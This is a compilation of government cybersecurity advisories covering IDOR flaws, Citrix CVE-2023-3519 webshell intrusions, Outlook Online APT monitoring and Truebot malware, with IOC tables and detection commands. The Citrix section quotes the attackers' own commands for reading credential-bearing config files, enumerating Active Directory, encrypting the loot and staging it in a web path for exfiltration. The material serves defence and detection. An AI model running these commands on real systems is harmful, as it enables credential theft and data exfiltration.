IDOR vulnerabilities are access control vulnerabilities in web applications (and mobile phone applications [apps] using affected web API) that occur when the application or API uses an identifier (e.g., ID number, name, or key) to directly access an object (e.g., a database record) but does not properly check the authentication or authorization of the user submitting the request. Depending on the type of IDOR vulnerability, malicious actors can access sensitive data, modify or delete objects, or access functions.
Typically, these vulnerabilities exist because an object identifier is exposed, passed externally, or easily guessed—allowing any user to use or modify the identifier.
Impact
These vulnerabilities are common[1] and hard to prevent outside the development process since each use case is unique and cannot be mitigated with a simple library or security function. Additionally, malicious actors can detect and exploit them at scale using automated tools. These factors place end-user organizations at risk of data leaks (where information is unintentionally exposed) or large-scale data breaches (where a malicious actor obtains exposed sensitive information). Data leaks or breaches facilitated by IDOR vulnerabilities include:
MITIGATIONS
Vendors and Developers
ACSC, CISA, and NSA recommend that vendors, designers, and implementors of web applications—including organizations that build and deploy software (such as HR tools) for their internal use and organizations that create open-source projects—implement the following mitigations. These mitigations may reduce prevalence of IDOR vulnerabilities in software and help ensure products are secure-by-design and -default.
For more information, see the joint Enduring Security Framework’s Securing the Software Supply Chain: Recommended Practices Guide for Developers, CISA’s Supply Chain Risk Management Essentials, and ACSC’s Cyber Supply Chain Risk Management.
Additionally, ACSC, CISA, and NSA recommend following cybersecurity best practices in production and enterprise environments. Software developers are high-value targets because their customers deploy software on their own trusted networks. For best practices, see:
All End-User Organizations
ACSC, CISA, and NSA recommend that all end-user organizations, including those with on-premises software, SaaS, IaaS, and private cloud models, implement the mitigations below to improve their cybersecurity posture.
For more information, see the Enduring Security Framework’s Securing the Software Supply Chain: Recommended Practices Guide for Customers, CISA’s Supply Chain Risk Management Essentials, and ACSC’s Cyber Supply Chain Risk Management.
Monitor for HTTP 404 and HTTP 403 responses; elevated volumes of these status codes are associated with common enumeration techniques.
Additionally, ACSC, CISA, and NSA recommend following cybersecurity best practices. For best practices, see ACSC’s Essential Eight, CISA’s CPGs, and NSA’s Top Ten Cybersecurity Mitigation Strategies.
End-User Organizations with On-Premises Software, IaaS, or Private Cloud Models
ACSC, CISA, and NSA recommend that organizations:
ACSC, CISA, and NSA recommend that organizations with on-premises software or IaaS consider using SaaS models for their internet-facing websites.
End-User Organizations with SaaS Models
Organizations leveraging SaaS with sufficient resources may consider conducting penetration testing and using vulnerability scanners. However, such tests may interfere with service provider operations. Organizations should consult with their legal counsel as appropriate to determine what can be included in the scope of the penetration testing.
INCIDENT RESPONSE
If you or your organization are victim to a data breach or cyber incident, follow relevant cyber incident response and communications plans, as appropriate.
RESOURCES
REFERENCES
[1] A01 Broken Access Control – OWASP Top 10:2021
[2] A massive ‘stalkerware’ leak puts the phone data of thousands at risk
[3] Mobile device monitoring services do not authenticate API requests
[4] Behind the stalkerware network spilling the private phone data of hundreds of thousands
[5] First American Financial Corp. Leaked Hundreds of Millions of Title Insurance Records
[6] Biggest Data Breaches in US History [Updated 2023]
[7] AT&T Hacker ‘Weev’ Sentenced to 3.5 Years in Prison
[8] Fuzzing | OWASP Foundation
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. ACSC, CISA, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States or Australian Governments, and this guidance shall not be used for advertising or product endorsement purposes.
PURPOSE
This document was developed in furtherance of the authors’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
Threat Actors Exploiting Citrix CVE-2023-3519 to Implant Webshells
SUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to warn network defenders about exploitation of CVE-2023-3519, an unauthenticated remote code execution (RCE) vulnerability affecting NetScaler (formerly Citrix) Application Delivery Controller (ADC) and NetScaler Gateway. In June 2023, threat actors exploited this vulnerability as a zero-day to drop a webshell on a critical infrastructure organization’s non-production environment NetScaler ADC appliance. The webshell enabled the actors to perform discovery on the victim’s Active Directory (AD) and collect and exfiltrate AD data. The actors attempted to move laterally to a domain controller but network-segmentation controls for the appliance blocked movement.
The victim organization identified the compromise and reported the activity to CISA and Citrix. Citrix released a patch for this vulnerability on July 18, 2023.
This advisory provides tactics, techniques, and procedures (TTPs) and detection methods shared with CISA by the victim. CISA encourages critical infrastructure organizations to use the detection guidance included in this advisory for help with determining system compromise. If potential compromise is detected, organizations should apply the incident response recommendations provided in this CSA. If no compromise is detected, organizations should immediately apply patches provided by Citrix.
Download the PDF version of this report:
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
Overview
In July 2023, a critical infrastructure organization reported to CISA that threat actors may have exploited a zero-day vulnerability in NetScaler ADC to implant a webshell on their non-production NetScaler ADC appliance. Citrix confirmed that the actors exploited a zero-day vulnerability: CVE-2023-3519. Citrix released a patch on July 18, 2023.[1]
CVE-2023-3519
CVE-2023-3519 is an unauthenticated RCE vulnerability affecting the following versions of NetScaler ADC and NetScaler Gateway:[1]
The affected appliance must be configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or authentication, authorization, and auditing (AAA) virtual server for exploitation.[1]
CISA added CVE-2023-3519 to its Known Exploited Vulnerabilities Catalog on July 19, 2023.
Threat Actor Activity
As part of their initial exploit chain [T1190], the threat actors uploaded a TGZ file [T1105] containing a generic webshell [T1505.003], discovery script [TA0007], and setuid binary [T1548.001] on the ADC appliance and conducted SMB scanning on the subnet [T1046].
The actors used the webshell for AD enumeration [T1016] and to exfiltrate AD data [TA0010]. Specifically, the actors:
- Viewed NetScaler ADC configuration files /flash/nsconfig/keys/updated/* and /nsconfig/ns.conf [T1005]. Note: These configuration files contain an encrypted password that can be decrypted by the key stored on the ADC appliance [T1552.001].
- Obtained the decryption keys and decrypted the AD credential held in those configuration files [T1552.004].
- Queried the AD via ldapsearch. The actors queried for:
  - (objectClass=user) (objectcategory=person) [T1033]
  - (objectClass=computer) [T1018]
  - (objectClass=group) [T1069.002]
  - (objectClass=subnet)
  - (objectClass=organizationalUnit)
  - (objectClass=contact)
  - (objectClass=partition)
  - (objectClass=trustedDomain) [T1482]
- Archived the collected discovery data in a “tar ball” and encrypted it via openssl [T1560.001]: tar -czvf - /var/tmp/all.txt | openssl des3 -salt -k <> -out /var/tmp/test.tar.gz (the -k passphrase is not reproduced here). (A “tar ball” is a compressed and zipped file used by threat actors for collection and exfiltration.)
- Staged the archive under an image file name in a web-accessible path [T1074] [T1036.008]: cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png.
The actors’ other discovery activities were unsuccessful due to the critical infrastructure organization’s deployment of their NetScaler ADC appliance in a segmented environment. The actors attempted to:
- Execute a subnet-wide curl command to identify what was accessible from within the network as well as potential lateral movement targets.
- Verify outbound network connectivity with a ping command (ping -c 1 google.com) [T1016.001].
- Execute host commands for a subnet-wide DNS lookup.
The actors also attempted to delete their artifacts [TA0005]. The actors deleted the authorization configuration file (/etc/auth.conf)—likely to prevent configured users (e.g., admin) from logging in remotely (e.g., CLI) [T1531]. To regain access to the ADC appliance, the organization would normally reboot into single-user mode, which may have deleted artifacts from the device; however, the victim had an SSH key readily available that allowed them into the appliance without rebooting it.
The actors’ post-exploitation lateral movement attempts were also blocked by network-segmentation controls. The actors implanted a second webshell on the victim that they later removed. This was likely a PHP shell with proxying capability. The actors likely used this to attempt proxying SMB traffic to the DC [T1090.001] (the victim observed SMB connections where the actors attempted to use the previously decrypted AD credential to authenticate with the DC from the ADC via a virtual machine). Firewall and account restrictions (only certain internal accounts could authenticate to the DC) blocked this activity.
MITRE ATT&CK TACTICS AND TECHNIQUES
See Table 1–Table 9 for all referenced threat actor tactics and techniques in this advisory.
Technique Title
ID
Use
Exploit Public-Facing Application
T1190
The threat actors exploited CVE-2023-3519 to implant a webshell on the organization’s NetScaler ADC appliance.
Technique Title
ID
Use
Server Software Component: Web Shell
T1505.003
The threat actors implanted a generic webshell on the organization’s NetScaler ADC appliance.
Technique Title
ID
Use
Abuse Elevation Control Mechanism: Setuid and Setgid
T1548.001
As part of their initial exploit chain, the threat actors uploaded a TGZ file containing a setuid binary on the ADC appliance.
Technique Title
ID
Use
Masquerading: Masquerade File Type
T1036.008
The threat actors exfiltrated data by uploading it as an image file to a web-accessible path.
Technique Title
ID
Use
Unsecured Credentials: Credentials In Files
T1552.001
The threat actors obtained encrypted passwords from NetScaler ADC configuration files, and the decryption key was stored on the ADC appliance.
Unsecured Credentials: Private Keys
T1552.004
The threat actors obtained decryption keys to decrypt the AD credential obtained from the NetScaler ADC configuration files.
Technique Title
ID
Use
Domain Trust Discovery
T1482
The threat actors queried the AD for trusts.
Permission Groups Discovery: Domain Groups
T1069.002
The threat actors queried the AD for groups.
Remote System Discovery
T1018
The threat actors queried the AD for computers.
The threat actors attempted to execute a subnet-wide curl command to identify what was accessible from within the network as well as potential lateral movement targets. Network-segmentation controls prevented this activity.
System Network Configuration Discovery
T1016
The actors used a webshell for AD enumeration.
System Network Configuration Discovery: Internet Connection Discovery
T1016.001
The threat actors attempted to verify outbound network connectivity with a ping command and executed host commands for a subnet-wide DNS lookup. Network-segmentation controls prevented this activity.
Network Service Discovery
T1046
The threat actors conducted SMB scanning on the organization’s subnet.
Account Discovery: Domain Account
T1087.002
The threat actors queried the AD for users.
Technique Title
ID
Use
Archive Collected Data: Archive via Utility
T1560.001
The threat actors archived the collected discovery data in a “tar ball” and encrypted it via openssl.
Data from Local System
T1005
The threat actors viewed NetScaler ADC configuration files /flash/nsconfig/keys/updated/* and /nsconfig/ns.conf.
Data Staged
T1074
The threat actors uploaded data as an image file to a web-accessible path: cp /var/tmp/test.tar.gz /netscaler/ns_gui/vpn/medialogininit.png.
Technique Title
ID
Use
Ingress Tool Transfer
T1105
The threat actors exploited CVE-2023-3519 to upload a TGZ file containing a generic webshell, discovery script, and setuid binary on the ADC appliance.
Proxy: Internal Proxy
T1090.001
The actors likely used a PHP shell with proxying capability to attempt proxying SMB traffic to the DC (the traffic was blocked by a firewall and account restrictions).
Technique Title
ID
Use
Account Access Removal
T1531
The threat actors deleted the authorization configuration file (/etc/auth.conf)—likely to prevent configured users from logging in remotely (e.g., CLI).
DETECTION METHODS
Run the following victim-created checks on the ADC shell interface to check for signs of compromise:
- Check for files newer than your last installation. Modify the -newermt parameter with the date that corresponds to your last installation. (The -name pattern is quoted so the shell does not expand it against the current directory, and the -exec terminator is the escaped \; — the published listing had lost the backslash, without which find reports a missing -exec argument.)
find /netscaler/ns_gui/ -type f -name '*.php' -newermt [YYYYMMDD] -exec ls -l {} \;
find /var/vpn/ -type f -newermt [YYYYMMDD] -exec ls -l {} \;
find /var/netscaler/logon/ -type f -newermt [YYYYMMDD] -exec ls -l {} \;
find /var/python/ -type f -newermt [YYYYMMDD] -exec ls -l {} \;
- Check the HTTP error logs for script references (the dot is escaped so the pattern matches the literal extension rather than any character followed by "sh"/"php"):
grep '\.sh' /var/log/httperror.log*
grep '\.php' /var/log/httperror.log*
- Check shell logs for unusual post-ex commands, for example:
grep '/flash/nsconfig/keys' /var/log/sh.log*
- Look for setuid binaries dropped:
find /var -perm -4000 -user root -not -path "/var/nslog/*" -newermt [YYYYMMDD] -exec ls -l {} \;
- If logon restrictions are configured for the AD account the ADC uses, check Windows Security event ID 4625 where the failure reason is “User not allowed to logon at this computer.”
- Review NetScaler ADC internal logs (sh.log*, bash.log*) for traces of potential malicious activity (some example keywords for grep are provided below):
database.php
ns_gui/vpn
/flash/nsconfig/keys/updated
LDAPTLS_REQCERT
ldapsearch
openssl + salt
- Review NetScaler ADC internal access logs (httpaccess-vpn.log*) for 200 successful access of unknown web resources.
INCIDENT RESPONSE
If compromise is detected, organizations should:
MITIGATIONS
CISA recommends all organizations:
VALIDATE SECURITY CONTROLS
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
REFERENCES
[1] Citrix Security Bulletin CTX561482: Citrix ADC and Citrix Gateway Security Bulletin for CVE-2023-3519, CVE-2023-3466, CVE-2023-3467
Enhanced Monitoring to Detect APT Activity Targeting Outlook Online
SUMMARY
In June 2023, a Federal Civilian Executive Branch (FCEB) agency identified suspicious activity in their Microsoft 365 (M365) cloud environment. The agency reported the activity to Microsoft and the Cybersecurity and Infrastructure Security Agency (CISA), and Microsoft determined that advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data.
CISA and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory to provide guidance to critical infrastructure organizations on enhancing monitoring of Microsoft Exchange Online environments. Organizations can enhance their cyber posture and position themselves to detect similar malicious activity by implementing logging recommendations in this advisory. Organizations that identify suspicious, anomalous activity should contact Microsoft for proceeding with mitigation actions due to the cloud-based infrastructure affected, as well as report to CISA and the FBI.
Download the PDF version of this report:
TECHNICAL DETAILS
In mid-June 2023, an FCEB agency observed MailItemsAccessed events with an unexpected ClientAppID and AppID in M365 Audit Logs. The MailItemsAccessed event is generated when licensed users access items in Exchange Online mailboxes using any connectivity protocol from any client. The FCEB agency deemed this activity suspicious because the observed AppId did not normally access mailbox items in their environment. The agency reported the activity to Microsoft and CISA.
Microsoft determined that APT actors accessed and exfiltrated unclassified Exchange Online Outlook data from a small number of accounts. The APT actors used a Microsoft account (MSA) consumer key to forge tokens to impersonate consumer and enterprise users. Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse.[1]
The affected FCEB agency identified suspicious activity by leveraging enhanced logging—specifically of MailItemsAccessed events—and an established baseline of normal Outlook activity (e.g., expected AppID). The MailItemsAccessed event enables detection of otherwise difficult-to-detect adversarial activity. CISA and FBI are not aware of other audit logs or events that would have detected this activity. Critical infrastructure organizations are strongly urged to implement the logging recommendations in this advisory to enhance their cybersecurity posture and position themselves to detect similar malicious activity.
LOGGING
CISA and the FBI strongly encourage critical infrastructure organizations to ensure audit logging is enabled. Note: Per CISA’s Microsoft Exchange Online Microsoft 365 Minimum Viable Secure Configuration Baselines, FCEB agencies shall enable audit logging. These minimum viable secure configuration baselines are part of CISA’s Secure Cloud Business Applications (SCuBA) Project, which provides guidance for FCEB agencies securing their cloud business application environments and protecting federal information created, accessed, shared, and stored in those environments. Although tailored to FCEB agencies, the project provides security guidance applicable to all organizations with cloud environments. The Office of Management and Budget (OMB) M-21-31 requires Microsoft audit logs be retained for at least twelve months in active storage and an additional eighteen months in cold storage. This can be accomplished either by offloading the logs out of the cloud environment or natively through Microsoft by creating an audit log retention policy.
In addition to enabling audit logging, CISA and FBI strongly encourage organizations to:
GENERAL CLOUD MITIGATIONS
All mitigation actions for this activity are the responsibility of Microsoft due to the cloud-based infrastructure affected; however, CISA and the FBI recommend that critical infrastructure organizations implement the following to harden their cloud environments. Although, these mitigations will not prevent this or related activity where actors leverage compromised consumer keys, they will reduce the impact of less sophisticated malicious activity targeting cloud environments. Note: These mitigations align with CISA’s SCuBA Technical Reference Architecture (TRA), which describes essential components of security services and capabilities to secure and harden cloud business applications, including the platforms hosting the applications.
REPORTING SUSPICIOUS ACTIVITY
Organizations are encouraged to report suspicious activity to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or IC3.gov.
RESOURCES
REFERENCES
[1] Microsoft Security Response Center (MSRC) blog: Microsoft mitigates China-based threat actor Storm-0558 targeting of customer email
ACKNOWLEDGEMENTS
Microsoft contributed to this CSA.
DISCLAIMER
The information in this report is being provided “as is” for informational purposes only. The FBI, and CISA do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI and CISA.
Source de l’article sur us-cert.gov
Increased Truebot Activity Infects U.S. and Canada Based Networks
Sécurité de l'information et du SI, Sécurité de l’information, Sécurité du système d’information
SUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Canadian Centre for Cyber Security (CCCS) are releasing this joint Cybersecurity Advisory (CSA) in response to cyber threat actors leveraging newly identified Truebot malware variants against organizations in the United States and Canada. As recently as May 31, 2023, the authoring organizations have observed an increase in cyber threat actors using new malware variants of Truebot (also known as Silence.Downloader). Truebot is a botnet that has been used by malicious cyber groups like CL0P Ransomware Gang to collect and exfiltrate information from its target victims.
Previous Truebot malware variants were primarily delivered by cyber threat actors via malicious phishing email attachments; however, newer versions allow cyber threat actors to also gain initial access through exploiting CVE-2022-31199 (a remote code execution vulnerability in the Netwrix Auditor application), enabling deployment of the malware at scale within the compromised environment. Based on confirmation from open-source reporting and analytical findings of Truebot variants, the authoring organizations assess cyber threat actors are leveraging both phishing campaigns with malicious redirect hyperlinks and CVE-2022-31199 to deliver new Truebot malware variants.
The authoring organizations recommend hunting for the malicious activity using the guidance outlined in this CSA, as well as applying vendor patches to Netwrix Auditor (version 10.5—see Mitigations section below).[1] Any organization identifying indicators of compromise (IOCs) within their environment should urgently apply the incident responses and mitigation measures detailed in this CSA and report the intrusion to CISA or the FBI.
Download the PDF version of this report:
Read the associated Malware Analysis Report MAR-10445155-1.v1 Truebot Activity Infects U.S. and Canada Based Networks or download the PDF version below:
For a downloadable copy of IOCs in .xml and .json format, see:
TECHNICAL DETAILS
Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section below for cyber threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
Initial Access and Execution
In recent months, open source reporting has detailed an increase in Truebot malware infections, particularly cyber threat actors using new tactics, techniques, and procedures (TTPs), and delivery methods.[2] Based on the nature of observed Truebot operations, the primary objective of a Truebot infection is to exfiltrate sensitive data from the compromised host(s) for financial gain [TA0010].
Following the successful download of the malicious file, Truebot renames itself and then loads FlawedGrace onto the host. Please see the FlawedGrace section below for more information on how this remote access tool (RAT) is used in Truebot operations.
After deployment by Truebot, FlawedGrace is able to modify registry [T1112] and print spooler programs [T1547.012] that control the order that documents are loaded to a print queue. FlawedGrace manipulates these features to both escalate privilege and establish persistence.
During FlawedGrace’s execution phase, the RAT stores encrypted payloads [T1027.009] within the registry. The tool can create scheduled tasks and inject payloads into msiexec.exe and svchost.exe, which are command processes that enable FlawedGrace to establish a command and control (C2) connection to 92.118.36[.]199, for example, as well as load dynamic link libraries (DLLs) [T1055.001] to accomplish privilege escalation. Several hours post initial access, Truebot has been observed injecting Cobalt Strike beacons into memory [T1055] in a dormant mode for the first few hours prior to initiating additional operations. Please see the Cobalt Strike section below for more information on how this remote access tool (RAT) is used in Truebot operations.
Discovery and Defense Evasion
During the first stage of Truebot’s execution process, it checks the current version of the operating system (OS) with RtlGetVersion and processor architecture using GetNativeSystemInfo [T1082].[4] Note: This variant of Truebot malware is designed with over one gigabyte (GB) of junk code, which functions to hinder detection and analysis efforts [T1027.001]. Following the initial checks for system information, Truebot has the capability to enumerate all running processes [T1057], collect sensitive local host data [T1005], and send this data to an encoded data string described below for second-stage execution. Based on IOCs in table 1, Truebot also has the ability to discover software security protocols and system time metrics, which aids in defense evasion, as well as enables synchronization with the compromised system’s internal clock to facilitate scheduling tasks [T1518.001][T1124].
Next, it uses a .JSONIP extension (e.g., IgtyXEQuCEvAM.JSONIP) to create a thirteen-character globally unique identifier (GUID)—a 128-bit text string that Truebot uses to label and organize the data it collects [T1036]. After creating the GUID, Truebot compiles and enumerates running process data into either a base64 or unique hexadecimal encoded string [T1027.001]. Truebot’s main goal is identifying the presence of security debugger tools. However, the presence of identified debugger tools does not change Truebot’s execution process—the data is compiled into a base64 encoded string for tracking and defense evasion purposes [T1082][T1622].
Data Collection and Exfiltration
Following Truebot’s enumeration of running processes and tools, the affected system’s computer and domain name [T1082][T1016], along with the newly generated GUID, are sent to a hard-coded URL in a POST request (as observed in the user-agent string). Note: A user-agent string is a customized HTTP request header that includes specific device information required for interaction with web content. In this instance, cyber threat actors can redirect victims to malicious domains and further establish a C2 connection. The POST request functions as a means for establishing a C2 connection for bi-lateral communication. With this established connection, Truebot uses a second obfuscated domain to receive additional payloads [T1105], self-replicate across the environment [T1570], and/or delete files used in its operations [T1070.004]. Truebot malware has the capability to download additional malicious modules [T1105], load shell code [T1620], and deploy various tools to stealthily navigate an infected network.
Associated Delivery Vectors and Tools
Truebot has been observed in association with the following delivery vectors and tools:
Raspberry Robin (Malware)
Raspberry Robin is a wormable malware with links to other malware families and various infection methods, including installation via USB drive [T1091].[5] Raspberry Robin has evolved into one of the largest malware distribution platforms and has been observed deploying Truebot, as well as other post-compromise payloads such as IcedID and Bumblebee malware.[6] With the recent shift in Truebot delivery methods from malicious emails to the exploitation of CVE-2022-31199, a large number of Raspberry Robin infections have leveraged this exploitable CVE.[2]
Flawed Grace (Malware)
FlawedGrace is a remote access tool (RAT) that can receive incoming commands [T1059] from a C2 server sent over a custom binary protocol [T1095] using port 443 to deploy additional tools [T1105].[7] Truebot malware has been observed leveraging (and dropping) FlawedGrace via phishing campaigns as an additional payload [T1566.002].[8] Note: FlawedGrace is typically deployed minutes after Truebot malware is executed.
Cobalt Strike (Tool)
Cobalt Strike is a popular remote access tool (RAT) that cyber threat actors have leveraged—in an observable manner—for a variety of post-exploitation means. Typically a few hours after Truebot’s execution phase, cyber threat actors have been observed deploying additional payloads containing Cobalt Strike beacons for persistence and data exfiltration purposes [T1059].[2] Cyber threat actors use Cobalt Strike to move laterally via remote service session hijacking [T1563.001][T1563.002], collecting valid credentials through LSASS memory credential dumping, or creating local admin accounts to achieve pass the hash alternate authentication [T1003.001][T1550.002].
Teleport (Tool)
Cyber threat actors have been observed using a custom data exfiltration tool, which Talos has named “Teleport.”[2] Teleport is known to evade detection during data exfiltration by using an encryption key hardcoded in the binary and a custom communication protocol [T1095] that encrypts data using advanced encryption standard (AES) and a hardcoded key [T1048][T1573.002]. Furthermore, to maintain its stealth, Teleport limits the data it collects and syncs with outbound organizational data/network traffic [T1029][T1030].
Truebot Malware Indicators of Compromise (IOCs)
Truebot IOCs from May 31, 2023, contain IOCs from cyber threat actors conducting Truebot malspam campaigns. Information is derived from a trusted third party, which observed cyber threat actors from 193.3.19[.]173 (Russia) using a compromised local account to conduct phishing campaigns on May 23, 2023 and spread malware through https[:]//snowboardspecs[.]com/nae9v, which then promptly redirects the user to https://www.meditimespharma[.]com/gfghthq/, which a trusted third party has linked to other trending Truebot activity. After redirecting to https://www.meditimespharma[.]com/gfghthq/, trusted third parties have observed the cyber threat actors using Truebot to pivot to https://corporacionhardsoft[.]com/images/2/Document_16654.exe, which is a domain associated with snowboardspecs[.]com, as well as with malicious phishing campaigns in May 2023 flagged by numerous security vendors, according to trusted third party reporting. Note: these IOCs are associated with Truebot campaigns used by Graceful Spider to deliver FlawedGrace and LummaStealer payloads in May of 2023. The malicious file MD5 hash, 6164e9d297d29aa8682971259da06848, is associated with multiple Truebot-rooted attack vectors and malware families, and was downloaded from https://corporacionhardsoft.com/images/2/Document_16654[.]exe, which was flagged as malicious by numerous security vendors. During its execution, the malware copies itself to C:IntelRuntimeBroker.exe and, based on trusted third party analysis, is linked to https://essadonio.com/538332[.]php, which is linked to 45.182.189[.]71 (Panama) and is associated with other trending Truebot malware campaigns from May 2023. Please reference table 1 for IOCs described in the paragraph above.
Indicator Type
Indicator
Source
Registrant
GKG[.]NET Domain Proxy Service Administrator
Trusted Third Party
Compromised Account Created:
2022-04-10
Trusted Third Party
Malicious account created
1999-11-09
Trusted Third Party
IP
193.3.19[.]173 (Russia)
Trusted Third Party
URL
https://snowboardspecs[.]com/nae9v
Trusted Third Party
Domain
https://corporacionhardsoft[.]com/images/2/Document_16654.exe
Trusted Third Party
File
Document_16654[.]exe
Trusted Third Party
MD5 Hash
6164e9d297d29aa8682971259da06848
Trusted Third Party
File
Document_may_24_16654[.]exe
Trusted Third Party
File
C:IntelRuntimeBroker[.]exe
Trusted Third Party
URL
https://essadonio.com/538332[.]php
Trusted Third Party
IP
45.182.189[.]71 (Panama)
Trusted Third Party
Account Created
2023-05-18
Trusted Third Party
Indicator Type
Indicator
Source
URL
Secretsdump[.]py#l374
Domain
Secretsdump[.]py
Domain
Imsagentes[.]pe
URL
https://imsagentes[.]pe/dgrjfj/
URL
https://imsagentes[.]pe/dgrjfj
URL
https://hrcbishtek[.]com/{5
URL
https://ecorfan.org/base/sj/document_may_24_16654[.]exe
Domain
Hrcbishtek[.]com
File
F33734DFBBFF29F68BCDE052E523C287
File
F176BA63B4D68E576B5BA345BEC2C7B7
File
F14F2862EE2DF5D0F63A88B60C8EEE56
Domain
Essadonio[.]com
Domain
Ecorfan[.]org
File
C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3
Domain
Atexec[.]py
File
A0E9F5D64349FB13191BC781F81F42E1
IPv4
92.118.36[.]199
IPv4
81.19.135[.]30
File
72A589DA586844D7F0818CE684948EEA
File
717BEEDCD2431785A0F59D194E47970E9544FBF398D462A305F6AD9A1B1100CB
IPv4
5.188.86[.]18
IPv4
5.188.206[.]78
IPv4
45.182.189[.]71
IPv4
139.60.160[.]166
File
121A1F64FFF22C4BFCEF3F11A23956ED403CDEB9BDB803F9C42763087BD6D94E
nitutdra[.]com
46.161.40[.]128
romidonionhhgtt[.]com
46.161.40.128
midnigthwaall[.]com
46.161.40[.]128
dragonetzone[.]com
46.161.40[.]128
hxxps://dragonetzone[.]com/gate_info[.]php
rprotecruuio[.]com
45.182.189[.]71
essadonio[.]com
45.182.189[.]71
hxxps://nomoresense[.]com/checkinfo[.]php
nomoresense[.]com
45.182.189[.]91
hxxps://nomoresense[.]com/checkinfo[.]php
ronoliffuion[.]com
45.182.189[.]120
hxxps://ronoliffuion[.]com/dns[.]php
bluespiredice[.]com
45.182.189[.]119
dremmfyttrred[.]com
45.182.189[.]103
hxxps://dremmfyttrred[.]com/dns[.]php
ms-online-store[.]com
45.227.253[.]102
ber6vjyb[.]com
92.118.36[.]252
hxxps://ber6vjyb[.]com/dns[.]php
jirostrogud[.]com
88.214.27[.]101
hxxps://ber6vjyb[.]com/dns[.]php
fuanshizmo[.]com
45.182.189[.]229
qweastradoc[.]com
92.118.36[.]213
hxxp://nefosferta[.]com/gate[.]php
qweastradoc[.]com
92.118.36[.]213
hxxp://nefosferta[.]com/gate[.]php
qweastradoc[.]com
92.118.36[.]213
hxxp://nefosferta[.]com/gate[.]php
hiperfdhaus[.]com
88.214.27[.]100
hxxp://nefosferta[.]com/gate[.]php
guerdofest[.]com
45.182.189[.]228
hxxp://qweastradoc[.]com/gate[.]php
nefosferta[.]com
179.60.150[.]139
hxxp://nefosferta[.]com/gate[.]php
Malicious Domain
MD5
SHA1
SHA256
nitutdra[.]com
romidonionhhgtt[.]com
midnigthwaall[.]com
dragonetzone[.]com
64b27d2a6a55768506a5658a31c045de
c69f080180430ebf15f984be14fb4c76471cd476
e0178ab0893a4f25c68ded11e74ad90403443e413413501d138e0b08a910471e
rprotecruuio[.]com
essadonio[.]com
9a3bad7d8516216695887acc9668cda1
a89c097138e5aab1f35b9a03900600057d907690
4862618fcf15ba4ad15df35a8dcb0bdb79647b455fea6c6937c7d050815494b0
essadonio[.]com
6164e9d297d29aa8682971259da06848
96b95edc1a917912a3181d5105fd5bfad1344de0
717beedcd2431785a0f59d194e47970e9544fbf398d462a305f6ad9a1b1100cb
nomoresense[.]com
8f924f3cbe5d8fe3ecb7293478901f1a
516051b4cab1be74d32a6c446eabac7fc354904f
6b646641c823414c2ee30ae8b91be3421e4f13fa98e2d99272956e61eecfc5a1
nomoresense[.]com
ac6a2f1eafaae9f6598390d1017dd76c
1c637c2ded5d3a13fd9b56c35acf4443f308be52
f9f649cb5de27f720d58aa44aec6d0419e3e89f453730e155067506ad3ece638
ronoliffuion[.]com
881485ac77859cf5aaa8e0d64fbafc5f
51be660a3bdaab6843676e9d3b2af8444e88bbda
36d89f0455c95f9b00a8cea843003d0b53c4e33431fe57b5e6ec14a6c2e00e99
bluespiredice[.]com
dremmfyttrred[.]com
e4a42cbda39a20134d6edcf9f03c44ed
afda13d5365b290f7cdea701d00d05b0c60916f8
47f962063b42de277cd8d22550ae47b1787a39aa6f537c5408a59b5b76ed0464
dremmfyttrred[.]com
aa949d1a7ebe5f878023c6cfb446e29b
06057d773ad04fda177f6b0f6698ddaa47f7168a
594ade1fb42e93e64afc96f13824b3dbd942a2cdbc877a7006c248a38425bbc1
dremmfyttrred[.]com
338476c2b0de4ee2f3e402f3495d0578
03916123864aa034f7ca3b9d45b2e39b5c91c502
a67df0a8b32bdc5f9d224db118b3153f66518737e702314873b673c914b2bb5c
ms-online-store[.]com
ber6vjyb[.]com
46fe07c07fd0f45ba45240ef9aae2a44
b918f97c7c6ebc9594de3c8f2d9d75ecc292d02b
c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125
jirostrogud[.]com
89c8afc5bbd34f160d8a2b7218b9ca4a
16ecf30ff8c7887037a17a3eaffcb17145b69160
5cc8c9f2c9cee543ebac306951e30e63eff3ee103c62dadcd2ce43ef68bc7487
jirostrogud[.]com
5da364a8efab6370a174736705645a52
